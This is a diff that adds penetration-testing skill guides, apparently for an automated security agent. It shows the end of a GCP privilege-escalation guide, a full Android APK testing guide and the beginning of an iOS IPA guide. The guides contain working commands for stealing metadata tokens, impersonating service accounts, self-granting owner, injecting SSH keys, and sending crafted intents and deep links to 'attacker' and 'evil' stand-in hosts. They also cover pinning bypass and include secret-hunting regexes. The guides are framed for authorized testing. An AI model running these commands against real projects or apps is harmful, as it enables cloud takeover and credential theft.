+# Which scopes and SA email back this token
+curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes"
+curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email"
+# Identity (ID) token with a chosen audience - useful against IAP/Cloud Run
+curl -s -H "Metadata-Flavor: Google" \
+  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/identity?audience=https://example.run.app"
+```
+
+### Service Account Impersonation and Keys
+
+`iam.serviceAccounts.getAccessToken` (and `signJwt`, `signBlob`) on a target SA lets an identity mint that SA's tokens directly through the IAM Credentials API without ever holding a key. `iam.serviceAccounts.getOpenIdToken` yields an ID token. The ability to create a key (`iam.serviceAccountKeys.create`) is durable, exportable credential theft.
+
+**Test:**
+```
+# Enumerate SAs and test impersonation
+gcloud iam service-accounts list
+gcloud auth print-access-token --impersonate-service-account=<sa>@<proj>.iam.gserviceaccount.com
+# Raw IAM Credentials API token mint
+curl -s -X POST -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" \
+  "https://iamcredentials.googleapis.com/v1/projects/-/serviceAccounts/<sa>@<proj>.iam.gserviceaccount.com:generateAccessToken" \
+  -d '{"scope":["https://www.googleapis.com/auth/cloud-platform"]}'
+# Create and download a long-lived key (persistence)
+gcloud iam service-accounts keys create key.json --iam-account=<sa>@<proj>.iam.gserviceaccount.com
+gcloud auth activate-service-account --key-file=key.json
+```
+
+### IAM Privilege Escalation
+
+A long catalog of single permissions escalate to project owner. `iam.serviceAccounts.actAs` plus a deploy permission (create a Function, GCE instance, Cloud Run service, or Deployment Manager config) runs attacker code as a higher-privileged SA. `iam.roles.update` rewrites a custom role you hold; `resourcemanager.projects.setIamPolicy` grants yourself owner; `iam.serviceAccounts.implicitDelegation` chains impersonation across SAs.
+
+**Test:**
+```
+# Inventory who-can-do-what; testIamPermissions reveals your effective rights
+gcloud projects get-iam-policy <proj> --format=json
+gcloud iam roles describe roles/owner   # compare against custom roles you can update
+# actAs + cloudfunctions.create: deploy a function that runs as a privileged SA
+gcloud functions deploy esc --runtime=python311 --trigger-http --allow-unauthenticated \
+  --service-account=<priv-sa>@<proj>.iam.gserviceaccount.com --entry-point=h --source=.
+# actAs + compute.instances.create: startup script reads the metadata token
+gcloud compute instances create esc --zone=us-central1-a \
+  --service-account=<priv-sa>@<proj>.iam.gserviceaccount.com --scopes=cloud-platform \
+  --metadata=startup-script='curl -s -H "Metadata-Flavor: Google" http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token > /tmp/t'
+# Grant yourself owner (setIamPolicy)
+gcloud projects add-iam-policy-binding <proj> --member=user:you@x.com --role=roles/owner
+```
+
+### GCS Bucket Misconfiguration
+
+Buckets or objects granting `allUsers` (anyone, unauthenticated) or `allAuthenticatedUsers` (any Google account) are world-readable, and `roles/storage.objectAdmin`/`legacyBucketWriter` on those members is world-writable - an attacker can overwrite served objects, deployment artifacts, or Terraform state. Service account keys and `.env` files routinely sit in misconfigured buckets.
+
+**Test:**
+```
+# Read bucket IAM and ACLs; allUsers/allAuthenticatedUsers are the red flags
+gsutil iam get gs://<bucket>
+gsutil ls -r gs://<bucket>/
+curl -s "https://storage.googleapis.com/<bucket>/<object>"
+# Brute-force globally-unique bucket names (GCPBucketBrute also tests privilege)
+python3 gcpbucketbrute.py -k <org-keyword> -u
+# Test write access (proves objectAdmin/legacyBucketWriter on allUsers)
+echo test | gsutil cp - gs://<bucket>/strix-poc.txt
+```
+
+### Compute Engine and Custom Images
+
+Permission to read instance metadata or create/modify instances exposes startup scripts and SSH keys, which often embed secrets. `compute.instances.setMetadata` injects an SSH key for OS Login bypass; reading a custom image or snapshot can recover an entire disk's secrets.
+
+**Test:**
+```
+gcloud compute instances list
+gcloud compute instances describe <vm> --zone=<zone> --format="value(metadata.items)"
+# Inject an SSH key via metadata for direct access
+gcloud compute instances add-metadata <vm> --zone=<zone> \
+  --metadata=ssh-keys="attacker:ssh-rsa AAAA... attacker"
+# Enumerate images/snapshots that may hold credentials
+gcloud compute images list --no-standard-images
+```
+
+### Cloud Functions and Cloud Run
+
+Each function/service runs as a runtime service account (default: the App Engine or Compute default SA, often Editor). Deploy or update rights are RCE as that SA; an unauthenticated HTTP trigger that proxies the metadata server is a public credential leak.
+
+**Test:**
+```
+gcloud functions list && gcloud run services list
+gcloud functions describe <fn> --format="value(serviceAccountEmail)"
+# Deploy a function that returns its own SA token over HTTP
+gcloud functions deploy leak --runtime=python311 --trigger-http --allow-unauthenticated \
+  --entry-point=h --source=.
+curl -s "https://<region>-<proj>.cloudfunctions.net/leak"
+```
+
+## Bypass Techniques
+
+**Scope vs IAM intersection**
+- A token from a `storage-ro`-scoped instance cannot write even if the SA has Editor - check scopes before assuming a permission works
+- Impersonation via the IAM Credentials API lets you request `cloud-platform` scope explicitly, bypassing the limited instance scopes
+
+**Impersonation chaining**
+- `getAccessToken` on SA-A, which itself has `getAccessToken` on SA-B, walks a chain to a privileged target
+- `implicitDelegation` formalizes multi-hop impersonation; `signJwt` forges a self-signed assertion to exchange for any scope
+
+**Default service account abuse**
+- The Compute/App Engine default SA is frequently left with project Editor; any workload using it inherits near-total project control
+- Functions and Cloud Build default to these SAs unless overridden - deploying code is often Editor-equivalent RCE
+
+## Testing Methodology
+
+1. **Identify the identity** - `gcloud config list`, `gcloud auth print-access-token`, decode the token's scopes via the metadata `scopes` endpoint
+2. **Pull the metadata token** - on any compromised compute, fetch the SA token and its scopes from `metadata.google.internal`
+3. **Enumerate IAM** - `get-iam-policy` at project/folder/org; list service accounts and existing key counts
+4. **Find escalation permissions** - look for `actAs`, `getAccessToken`/`signJwt`, `setIamPolicy`, `roles.update`, and deploy permissions
+5. **Sweep storage** - GCPBucketBrute for guessable names; test `allUsers`/`allAuthenticatedUsers` read and write
+6. **Test impersonation** - `--impersonate-service-account` and the generateAccessToken API against higher-priv SAs
+7. **Achieve code execution** - deploy a Function/Cloud Run/GCE startup script as a privileged SA, then re-pull its token
+8. **Persist** - create an exportable SA key or self-bind a privileged role
+9. **Map the graph** - record edges (who can impersonate/actAs whom) to find the shortest path to project owner
+
+## Validation
+
+1. Decode the captured token (`tokeninfo` endpoint) to confirm its scopes and bound SA before claiming access
+2. Make one read-only call (`gcloud projects describe`, `gsutil ls`) to prove the token/identity is live
+3. For escalation permissions, show `testIamPermissions` or the role definition lists the dangerous permission - avoid actually granting owner in production
+4. For buckets, show anonymous read returning real content and, for write, upload a single benign marker object you then delete
+5. For deploy-based RCE, return a benign command's output or the SA token rather than mutating production resources
+
+## False Positives
+
+- Metadata server reachable but returning a token with scopes restricted to `userinfo.email`/`storage-ro` - narrow, not full control
+- A service account with broad IAM but attached to an instance whose access scopes cap it to read-only
+- Bucket listing `allUsers` but only on objects intended to be public (static website assets, public datasets)
+- `actAs`/impersonation permission granted on an SA that has no privileges itself
+- Custom role containing a scary permission name that is not actually bound to your principal at the relevant resource level
+
+## Impact
+
+- Project takeover via `actAs` + deploy, `setIamPolicy` self-grant, or default-SA Editor inheritance
+- Organization-wide compromise when escalation lands on an org-level admin or a folder-spanning SA
+- Long-lived credential theft through exported service account keys that survive token expiry
+- Data exfiltration from world-readable GCS buckets (backups, keys, PII) and modification of served artifacts
+- Code execution as privileged service accounts via Functions, Cloud Run, GCE startup scripts, and Cloud Build
+- Lateral movement across projects through cross-project SA bindings and impersonation chains
+
+## Pro Tips
+
+1. Check the instance access scopes before trusting an SA token - scopes silently cap a token regardless of IAM breadth
+2. Prefer impersonation (`generateAccessToken` with explicit `cloud-platform`) over instance tokens to escape narrow scopes
+3. The Compute/App Engine default SA with Editor is the most common single misconfiguration - any workload on it is near-owner
+4. `iam.serviceAccounts.actAs` is the keystone permission; pair it with any create permission for code execution as a better SA
+5. GCS bucket names are global and guessable - GCPBucketBrute against the org keyword routinely finds open backup buckets
+6. ID tokens from the metadata `identity?audience=` endpoint defeat IAP and Cloud Run auth when the audience matches the target
+7. Enumerate existing SA keys (`gcloud iam service-accounts keys list`) - a forgotten exported key is cleaner than minting a new one
+8. `gcloud --impersonate-service-account` works transparently across most commands, so test the full chain, not just the token call
+9. Cloud Build's default SA is highly privileged; a poisoned build trigger or `cloudbuild.yaml` is RCE as that SA
+
+## Summary
+
+GCP escalation is a graph of service-account control: a metadata token or leaked key gives initial identity, a single permission (`actAs` + deploy, `getAccessToken`/`signJwt`, `setIamPolicy`, or `roles.update`) converts it into code execution or self-granted ownership, and the Editor-by-default service accounts make many footholds owner-equivalent already. Always check scopes against IAM, prefer impersonation to bypass narrow instance scopes, sweep GCS for the credentials that restart the chain, and map who-can-act-as-whom to find the shortest path to project owner. Exported SA keys and self-bound roles are the durable persistence the obvious cleanup misses.

--- a/strix/skills/mobile/android_apk.md
+++ b/strix/skills/mobile/android_apk.md
@@ -1,0 +1,254 @@
+---
+name: android-apk
+description: Android APK security testing - static decompilation, AndroidManifest analysis, insecure storage, hardcoded secrets, cleartext traffic, WebView RCE, deep link abuse, and TLS/cert-pinning bypass
+---
+
+# Android APK Security Testing
+
+An Android APK is a ZIP container bundling compiled Dalvik bytecode (`classes*.dex`), resources, native libraries, and the `AndroidManifest.xml` that declares the app's components and permissions. The bulk of mobile findings come from the manifest (over-exported components, debuggable/backup flags), insecure on-device storage, secrets baked into the binary, and trust-decision code (TLS validation, cert pinning, WebView bridges) that an attacker controls once the device is rooted. Static analysis recovers logic and secrets without running anything; dynamic analysis with Frida/objection on a rooted device or emulator hooks the running process to defeat client-side controls. Most exported-component and deep-link abuse needs no root and runs from `adb` against a stock device. Cert-pinning bypass, Keychain/keystore inspection, and runtime hooking require a rooted device or a Google-APIs (non-Play) emulator image.
+
+## Attack Surface
+
+**Scope**
+- `AndroidManifest.xml` - declared activities, services, broadcast receivers, content providers, permissions, `intent-filter`s
+- DEX bytecode (`classes.dex`, `classes2.dex`, ...) decompiled to Java/Smali
+- Bundled native libs (`lib/<abi>/*.so`), assets, raw resources, `res/xml/network_security_config.xml`
+- On-device storage: `/data/data/<pkg>/shared_prefs`, `databases`, `files`, plus external/scoped storage
+- Hardcoded strings, certificates, and keystores in `res/`, `assets/`, and `strings.xml`
+- IPC surface: exported components, custom permissions, deep links (`scheme://`), App Links (`autoVerify`)
+
+**Entry Points**
+- Exported activities/services/receivers/providers callable by any other app via `adb shell am`/`content`
+- `intent-filter`-matched deep links and App Links reachable from a browser or another app
+- WebView `addJavascriptInterface` bridges reachable from loaded web content
+- World-readable files, `MODE_WORLD_READABLE` prefs, and data written to shared external storage
+- `android:debuggable="true"` enabling `run-as`/JDWP attach; `android:allowBackup="true"` enabling `adb backup`
+
+**Permissions and identity**
+- Manifest `permission` and `uses-permission` plus custom `protectionLevel` (`normal`/`dangerous`/`signature`)
+- Components protected only by `normal`-level custom permissions are effectively unprotected (any app can request them)
+- Signature scheme in use (v1 JAR signature, v2/v3 APK Signature Scheme) - v1-only signing is vulnerable to the Janus class
+- `taskAffinity` and `launchMode` settings that govern task/back-stack placement
+
+## Key Vulnerabilities
+
+### Manifest Misconfiguration and Exported Components
+
+- `android:exported="true"` (or implicit-true when an `intent-filter` is present pre-API-31) on activities/services/receivers/providers
+- `android:debuggable="true"` shipped in production - allows `run-as <pkg>` shell and JDWP debugger attach
+- `android:allowBackup="true"` (default) - `adb backup` extracts the full private data dir on non-rooted devices
+- Content providers with `android:grantUriPermissions="true"` or path traversal in `openFile()`
+- Custom permissions declared with `protectionLevel="normal"` guarding sensitive components
+
+**Test:**
+```
+apktool d target.apk -o target_src
+jadx -d target_out target.apk
+grep -nE 'android:(exported|debuggable|allowBackup)' target_src/AndroidManifest.xml
+# enumerate attack surface with drozer (rooted device or emulator + drozer agent app)
+drozer console connect
+run app.package.attacksurface com.target.app
+run app.activity.info -a com.target.app -i
+run app.provider.info -a com.target.app
+```
+
+### Intent Injection and Component Abuse
+
+- Exported activities trusting `Intent` extras for auth state, user id, or file paths (see idor, mass_assignment)
+- Exported services/receivers performing privileged work on attacker-supplied extras
+- `taskAffinity` hijack (StrandHogg class): a malicious app declaring the victim's affinity inserts itself into the task back stack to phish credentials
+- Implicit intents leaking sensitive extras to any app with a matching filter
+
+**Test:**
+```
+# launch an exported activity directly and inject extras
+adb shell am start -n com.target.app/.AdminActivity --es role admin --ez is_premium true
+# send a crafted broadcast to an exported receiver
+adb shell am broadcast -a com.target.app.ACTION_RESET --es token attacker
+# start an exported service with extras
+adb shell am startservice -n com.target.app/.SyncService --es url http://attacker/
+# via drozer
+run app.activity.start --component com.target.app .AdminActivity --extra string role admin
+```
+
+### Insecure Data Storage
+
+- Credentials/tokens in `shared_prefs/*.xml` in cleartext or trivially obfuscated
+- Sensitive rows in unencrypted SQLite (`databases/*.db`); SQLCipher key hardcoded in DEX
+- PII or tokens written to external/shared storage readable by other apps
+- Auth material cached in `WebView` cookies, `localStorage`, or HTTP response cache
+
+**Test:**
+```
+adb shell run-as com.target.app ls -la /data/data/com.target.app/shared_prefs /data/data/com.target.app/databases
+adb shell run-as com.target.app cat /data/data/com.target.app/shared_prefs/auth.xml
+adb exec-out run-as com.target.app cat /data/data/com.target.app/databases/app.db > app.db && sqlite3 app.db .tables
+# if allowBackup=true, extract without root
+adb backup -f backup.ab -noapk com.target.app
+( printf '\x1f\x8b\x08\x00\x00\x00\x00\x00' ; tail -c +25 backup.ab ) | gunzip | tar xvf -
+```
+
+### Hardcoded Secrets and API Keys
+
+- API keys, cloud credentials, signing secrets, and private endpoints in `strings.xml`, DEX constants, or native libs
+- Firebase database URLs with open read/write rules; backend keys reused server-side
+
+**Test:**
+```
+jadx -d target_out target.apk
+grep -rnE '(AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z_-]{35}|sk_live_[0-9A-Za-z]+|-----BEGIN (RSA|EC) PRIVATE KEY-----)' target_out target_src
+strings -n 8 target_src/lib/arm64-v8a/*.so | grep -iE 'secret|api[_-]?key|password|token'
+# full static scan
+mobsf  # then upload target.apk via the web UI, or use the REST API
+curl -s -F 'file=@target.apk' -H "Authorization: $MOBSF_KEY" http://127.0.0.1:8000/api/v1/upload
+```
+
+### Cleartext Traffic and Network Security Config
+
+- `android:usesCleartextTraffic="true"` or a `network_security_config.xml` permitting cleartext to backend domains
+- `<trust-anchors>` adding `user` CA store in production (lets any installed CA MITM the app)
+- `<debug-overrides>` accidentally shipped, or no config at all on API < 28 (cleartext allowed by default)
+
+**Test:**
+```
+cat target_src/res/xml/network_security_config.xml
+grep -nE 'cleartextTrafficPermitted|trust-anchors|<certificates src="user"' target_src/res/xml/*.xml
+grep -n 'usesCleartextTraffic' target_src/AndroidManifest.xml
+# observe actual traffic through an intercepting proxy
+adb shell settings put global http_proxy <attacker-ip>:8080
+```
+
+### WebView Vulnerabilities
+
+- `addJavascriptInterface(obj, "name")` exposing a Java object to loaded JS - reflection to `Runtime.exec` on API < 17, and direct method abuse on any version
+- `setJavaScriptEnabled(true)` combined with loading attacker-influenced or cleartext URLs
+- `setAllowFileAccess(true)`/`setAllowFileAccessFromFileURLs`/`setAllowUniversalAccessFromFileURLs` enabling `file://` reads of the app sandbox from loaded content
+- `shouldOverrideUrlLoading` returning false for arbitrary schemes; `loadUrl()` of intent-supplied URLs (see xss for the in-WebView payload)
+
+**Test:**
+```
+grep -rnE 'addJavascriptInterface|setJavaScriptEnabled|setAllowFileAccess|setAllowUniversalAccessFromFileURLs|loadUrl' target_out/sources
+# JS-to-Java RCE primitive on a vulnerable bridge named "Android" (API<17)
+# <script>console.log(Android.getClass().forName('java.lang.Runtime').getMethod('exec',[String]).invoke(...))</script>
+# drive a file:// read once a loadUrl sink is found
+adb shell am start -a android.intent.action.VIEW -d 'https://attacker/xss.html' -n com.target.app/.WebActivity
+```
+
+### Insecure Deep Links and App Links
+
+- Deep links passing tokens, redirect targets, or object ids straight into privileged flows (see idor, ssrf for the downstream sink)
+- App Links without `android:autoVerify="true"` or with an unreachable/incorrect `assetlinks.json`, allowing a malicious app to claim the host
+- WebView-backed deep link handlers that `loadUrl()` an attacker-controlled `url=` parameter
+
+**Test:**
+```
+# enumerate scheme/host filters
+grep -nA3 'intent-filter' target_src/AndroidManifest.xml | grep -E 'android:scheme|android:host|autoVerify'
+# fire a deep link from adb (acts like a browser/another app)
+adb shell am start -a android.intent.action.VIEW -d 'targetapp://reset?token=attacker&next=https://evil'
+# check App Link verification state
+adb shell pm get-app-links com.target.app
+curl -s https://target.com/.well-known/assetlinks.json
+```
+
+### TLS Validation and Certificate Pinning Bypass
+
+- Custom `TrustManager`/`HostnameVerifier` that accepts all certs (`checkServerTrusted` empty, `verify` returns true)
+- Pinning implemented client-side (OkHttp `CertificatePinner`, `TrustKit`, network-security-config pins) - all bypassable on a rooted device
+- TLS validation bypass is a client-side control: it protects against network attackers, not against an attacker who owns the device
+
+**Test:**
+```
+grep -rnE 'TrustManager|checkServerTrusted|HostnameVerifier|ALLOW_ALL|CertificatePinner|setHostnameVerifier' target_out/sources
+# defeat pinning at runtime (rooted device or rooted/Google-APIs emulator)
+objection -g com.target.app explore -s "android sslpinning disable"
+frida -U -f com.target.app -l frida-android-unpinning.js
+# combine with a system-CA proxy to read decrypted traffic
+adb root && adb remount  # install proxy CA into system store
+```
+
+### Janus and v1-Signature Tampering
+
+- APKs signed with v1 (JAR) signing only are vulnerable to Janus (CVE-2017-13156): a DEX file can be prepended to the APK ZIP and still pass v1 verification on API 21-26
+- v2/v3 APK Signature Scheme covers the whole file and defeats Janus; v1-only on older targets is repackageable
+
+**Test:**
+```
+apksigner verify --verbose --print-certs target.apk
+# Verified using v1 scheme (JAR signing): true / v2: false  => Janus-class exposure on API<=26
+# repackage-and-resign test (cert-pinning/root-detection patching workflow)
+apktool b target_src -o patched.apk
+apksigner sign --ks debug.keystore --ks-pass pass:android patched.apk
+adb install -r patched.apk
+```
+
+## Bypass Techniques
+
+**Root and emulator detection bypass**
+- Hook detection routines (`RootBeer`, file checks for `su`/Magisk, `getprop` reads) with objection (`android root disable`) or a Frida script returning false
+- Magisk DenyList / Zygisk hides root from a target package without disabling it system-wide
+
+**Repackaging**
+- `apktool d` -> patch Smali (flip a boolean, no-op a pinning/root check) -> `apktool b` -> resign with `apksigner` -> reinstall; works whenever integrity is checked only client-side
+
+**Proxy and CA trust**
+- On API >= 24 apps ignore the user CA store by default - install the proxy CA into the system store on a rooted device (`/system/etc/security/cacerts`) or use objection/Frida pinning bypass instead
+
+**Component permission gaps**
+- Custom `protectionLevel="normal"` permissions are grantable by any app - treat such "protected" exported components as fully exposed
+
+## Testing Methodology
+
+1. **Unpack** - `apktool d` for the manifest and Smali, `jadx`/`dex2jar` for readable Java, `unzip -l` to inventory assets and native libs
+2. **Baseline scan** - run the APK through MobSF for a fast pass over manifest flags, hardcoded secrets, weak crypto, and dangerous APIs
+3. **Manifest review** - enumerate exported components, debuggable/backup flags, custom permission levels, deep-link filters, and the network security config
+4. **Static secret hunt** - grep DEX and native strings for keys, endpoints, and private certs; trace where they're used
+5. **Component abuse** - drive exported activities/services/receivers and providers from `adb`/drozer; inject extras into auth-bearing flows
+6. **Storage review** - on a rooted device or via `run-as`/`adb backup`, dump `shared_prefs`, `databases`, and external storage; check for plaintext secrets
+7. **WebView and deep links** - locate `addJavascriptInterface`/`loadUrl`/file-access sinks and reachable scheme/App-Link handlers; fire crafted URLs
+8. **Runtime instrumentation** - attach Frida/objection (rooted device or Google-APIs emulator) to bypass pinning/root detection and read decrypted traffic through a proxy
+9. **Tamper test** - check signature scheme with `apksigner`; for v1-only/older targets, repackage and resign to confirm integrity is not enforced server-side
+
+## Validation
+
+1. For exported components, show the privileged action occurring (state change, data return) from an `adb`/drozer invocation that no UI path exposes
+2. For insecure storage, extract the concrete secret (token, key, PII) from the dumped file and confirm it is live by using it against the backend
+3. For hardcoded secrets, demonstrate the key authenticating to its service; do not flag rotated, sandbox, or client-public keys (Firebase web API keys are public by design)
+4. For pinning/TLS bypass, capture a decrypted request/response pair through the proxy after the bypass - the proof is the plaintext app traffic
+5. For deep links/WebView, demonstrate the downstream effect (IDOR read, SSRF, file exfil) reached through the link, not merely that the link opens
+6. For Janus/repackaging, show the resigned APK installing and running, or the prepended-DEX APK passing `apksigner verify` on the affected API range
+
+## False Positives
+
+- `android:exported="true"` on a launcher activity or a component guarded by a real `signature`-level permission - not an exposure
+- Hardcoded "secrets" that are public identifiers (Firebase web API keys, OAuth client ids, Google Maps keys restricted by package/SHA)
+- Pinning/TLS "bypass" achieved only on a rooted device - that is the expected client-side trust model, not a server-side flaw, unless the backend also trusts the client blindly
+- `allowBackup` flagged when the manifest also sets a `fullBackupContent`/`dataExtractionRules` that excludes sensitive paths
+- WebView `addJavascriptInterface` on API >= 17 where exposed methods are annotated `@JavascriptInterface` and expose nothing sensitive
+- Cleartext config entries scoped to `localhost`/debug domains only
+
+## Impact
+
+- Account takeover and privilege escalation via intent injection into auth/role-bearing flows
+- Theft of credentials, session tokens, and PII from insecure on-device storage or backups
+- Backend compromise from hardcoded API keys, cloud credentials, or signing secrets
+- Remote code execution in the app process through a WebView JavaScript bridge
+- Network MITM and traffic decryption where TLS validation is broken or pinning is the only control
+- App impersonation / malware distribution via Janus tampering or repackaging when integrity is unverified server-side
+- Cross-app data leakage through over-exported content providers and shared-storage writes
+
+## Pro Tips
+
+1. Read `AndroidManifest.xml` first - exported components, `debuggable`, `allowBackup`, and deep-link filters are the highest-yield findings and need no root
+2. `jadx` for readable logic, `apktool` for the real manifest and Smali patching - use both; jadx's decompiled manifest can drop attributes
+3. `run-as <pkg>` works on any `debuggable` build without root - it is the fastest path to the private data dir
+4. Pre-API-31, a component with an `intent-filter` is exported by default even without `android:exported` - check the `targetSdkVersion`
+5. Custom permissions at `protectionLevel="normal"` protect nothing - any installed app can hold them
+6. Use a Google-APIs (not Play Store) emulator image or a Magisk-rooted device for Frida - Play-protected images block the agent
+7. When pinning blocks the proxy, run objection's `android sslpinning disable` before launching the flow, not after - the pinned connection is made early
+8. `apksigner verify --verbose` tells you instantly whether Janus (v1-only) applies; v2/v3 closes it
+9. Decompiled string obfuscation usually decrypts at a single helper method - hook it with Frida to dump plaintext secrets at runtime instead of reversing the cipher
+
+## Summary
+
+Android findings chain from the manifest outward: an over-exported activity or a token-bearing deep link gives an attacker a foothold (idor/mass_assignment-style abuse), insecure storage and hardcoded secrets supply credentials, and broken TLS or a WebView bridge turns network position or loaded content into traffic decryption or in-process RCE. Static analysis with apktool/jadx/MobSF surfaces the logic and secrets; `adb`/drozer exercise the IPC surface with no root; Frida/objection on a rooted device defeat the client-side controls (pinning, root detection) that were the app's only protection. Prove each finding with the concrete effect - extracted secret, decrypted request, or privileged action - not the configuration alone.

--- a/strix/skills/mobile/ios_ipa.md
+++ b/strix/skills/mobile/ios_ipa.md
@@ -1,0 +1,245 @@
+---
+name: ios-ipa
+description: iOS IPA security testing - binary decryption and analysis, Info.plist/ATS review, insecure storage, Keychain misuse, hardcoded secrets, URL scheme abuse, WKWebView issues, and jailbreak/cert-pinning bypass
+---
+
+# iOS IPA Security Testing
+
+An iOS IPA is a ZIP archive whose `Payload/<App>.app` bundle contains a Mach-O executable, the `Info.plist`, bundled frameworks, and resources. App Store binaries ship encrypted under FairPlay (the `LC_ENCRYPTION_INFO` load command), so static analysis of real-world apps starts by dumping the decrypted Mach-O from a jailbroken device. The recurring weaknesses are client-side trust decisions (App Transport Security exceptions, custom cert validation, pinning), secrets stored in NSUserDefaults/plists/Keychain with the wrong protection class, secrets compiled into the binary, and IPC surface exposed through custom URL schemes and universal links. Static review (class-dump, otool, nm, a disassembler) maps the binary; dynamic instrumentation (Frida, objection) hooks the running process to defeat pinning and jailbreak detection. Binary decryption, Keychain dumping, runtime hooking, and on-device storage inspection require a jailbroken physical device (the iOS Simulator runs unencrypted x86_64/arm64 binaries and lacks the real Keychain and Data Protection semantics, so it is not a substitute for these steps).
+
+## Attack Surface
+
+**Scope**
+- `Payload/<App>.app/<App>` Mach-O executable (encrypted on App Store builds, decrypted on disk at runtime)
+- `Info.plist` - URL schemes, `NSAppTransportSecurity`, associated-domains entitlement, declared capabilities
+- Embedded frameworks (`Frameworks/*.framework`), `*.dylib`, and bundled resources/assets
+- On-device storage: app sandbox `Library/Preferences/*.plist` (NSUserDefaults), `Documents`, `Library/Application Support`, Core Data stores, the shared Keychain
+- Compiled strings, certificates, and pinned public keys in the Mach-O `__cstring`/`__const` sections
+- IPC: custom URL schemes (`scheme://`), universal links (`applinks:`), document/share extensions, pasteboard
+
+**Entry Points**
+- Custom URL schemes and universal links reachable from Safari, another app, or a QR code
+- App extensions (share, action, today) receiving attacker-influenced items
+- WKWebView content loading attacker-controlled or cleartext URLs
+- Files synced to iCloud/iTunes backup (items without `NSFileProtection`/`ThisDeviceOnly` Keychain attributes leave the device)
+- Pasteboard and inter-app data passed via `openURL`
+
+**Entitlements and identity**
+- `Info.plist` `CFBundleURLTypes` (claimed schemes - any app can also claim a scheme, so callers are untrusted)
+- `com.apple.developer.associated-domains` for universal links; absence or a bad `apple-app-site-association` lets the scheme be hijacked
+- Code signing / provisioning profile (`embedded.mobileprovision`), entitlements (`codesign -d --entitlements`)
+- Keychain access groups and `kSecAttrAccessible` protection class chosen per item
+
+## Key Vulnerabilities
+
+### Binary Encryption and Decryption
+
+- App Store binaries carry `LC_ENCRYPTION_INFO`/`LC_ENCRYPTION_INFO_64` with `cryptid 1`; static tools see only ciphertext until dumped
+- A decrypted dump exposes Objective-C class/method metadata, Swift symbols, and embedded strings/secrets
+
+**Test:**
+```
+unzip -o target.ipa -d target_extract
+otool -l "target_extract/Payload/Target.app/Target" | grep -A4 LC_ENCRYPTION_INFO
+# cryptid 1 => encrypted; dump the decrypted Mach-O from a jailbroken device
+frida-ios-dump -H <device-ip> -u mobile -P alpine com.target.app
+# or, on-device, use the dumpdecrypted dylib / objection memory dump
+objection -g com.target.app explore -s "ios bundles list_bundles"
+```
+
+### Binary Analysis and Symbol Recovery
+
+- Objective-C selectors and class layout recoverable with `class-dump`; reveals private APIs, debug methods, and logic
+- `nm`/`otool`/`strings` expose imported symbols, linked frameworks, and embedded constants; Hopper/Ghidra for control flow
+
+**Test:**
+```
+class-dump -H "target_extract/Payload/Target.app/Target" -o headers/
+otool -ov "target_extract/Payload/Target.app/Target" | grep -iE 'pin|trust|jailbreak|debug|secret'
+nm -u "target_extract/Payload/Target.app/Target"            # undefined (imported) symbols
+otool -L "target_extract/Payload/Target.app/Target"          # linked frameworks/dylibs
+strings -a "target_extract/Payload/Target.app/Target" | grep -iE 'https?://|api[_-]?key|password|token'
+```
+
+### Info.plist and App Transport Security
+
+- `NSAllowsArbitraryLoads = true` globally disables ATS; per-domain `NSExceptionAllowsInsecureHTTPLoads`/`NSExceptionMinimumTLSVersion` weaken specific hosts
+- Cleartext HTTP to backend domains; downgraded TLS versions; forward-secrecy exceptions
+
+**Test:**
+```
+plutil -p "target_extract/Payload/Target.app/Info.plist" | grep -A15 NSAppTransportSecurity
+plutil -convert xml1 -o - "target_extract/Payload/Target.app/Info.plist" | grep -iE 'ArbitraryLoads|InsecureHTTPLoads|MinimumTLSVersion'
+codesign -d --entitlements :- "target_extract/Payload/Target.app/Target"
+```
+
+### Insecure Local Storage
+
+- Secrets/tokens/PII in NSUserDefaults (`Library/Preferences/<bundleid>.plist`) in cleartext
+- Sensitive data in unencrypted Core Data / SQLite stores or plists under `Documents`/`Library`
+- Files written without `NSFileProtectionComplete`, readable from a backup or with the device unlocked-once
+
+**Test:**
+```
+# on a jailbroken device (sandbox path resolved via objection/frida)
+objection -g com.target.app explore -s "env"   # prints the app's Documents/Library paths
+objection -g com.target.app explore -s "ios nsuserdefaults get"
+objection -g com.target.app explore -s "ios plist cat /var/mobile/Containers/Data/Application/<UUID>/Library/Preferences/com.target.app.plist"
+# pull and inspect a Core Data / SQLite store
+sqlite3 store.sqlite .tables
+```
+
+### Keychain Misuse
+
+- Items stored with `kSecAttrAccessibleAlways`/`AfterFirstUnlock` instead of `WhenUnlockedThisDeviceOnly` - included in backups and/or readable while locked
+- Missing `ThisDeviceOnly` lets credentials migrate to a restored/cloned device; access groups shared too broadly across apps
+
+**Test:**
+```
+objection -g com.target.app explore -s "ios keychain dump"
+# inspect the protection class chosen per item
+frida -U -f com.target.app -l ios-keychain-dump.js
+# look for the requested accessibility constant in the binary
+strings -a "target_extract/Payload/Target.app/Target" | grep -iE 'kSecAttrAccessible'
+```
+
+### Hardcoded Secrets and API Keys
+
+- API keys, cloud credentials, encryption keys, and private endpoints compiled into `__cstring`/`__const` or bundled config plists
+- Pinned public keys and backend secrets reused server-side
+
+**Test:**
+```
+strings -a "target_extract/Payload/Target.app/Target" | grep -inE '(AKIA[0-9A-Z]{16}|AIza[0-9A-Za-z_-]{35}|sk_live_[0-9A-Za-z]+|-----BEGIN)'
+grep -rinE 'api[_-]?key|secret|password|token' "target_extract/Payload/Target.app/" --include='*.plist'
+# full static + secret scan
+curl -s -F 'file=@target.ipa' -H "Authorization: $MOBSF_KEY" http://127.0.0.1:8000/api/v1/upload
+```
+
+### URL Scheme and Universal Link Abuse
+
+- Handlers in `application(_:open:options:)` / `scene(_:openURLContexts:)` trusting URL parameters for auth, redirects, or object ids (see idor, ssrf, mass_assignment)
+- Custom schemes are first-come, claimable by any app - never treat the caller as trusted
+- Universal links without a valid `apple-app-site-association` (or missing associated-domains entitlement) fall back to a hijackable scheme
+
+**Test:**
+```
+plutil -p "target_extract/Payload/Target.app/Info.plist" | grep -A6 CFBundleURLTypes
+# trigger a scheme handler (Simulator or device)
+xcrun simctl openurl booted 'targetapp://reset?token=attacker&next=https://evil'
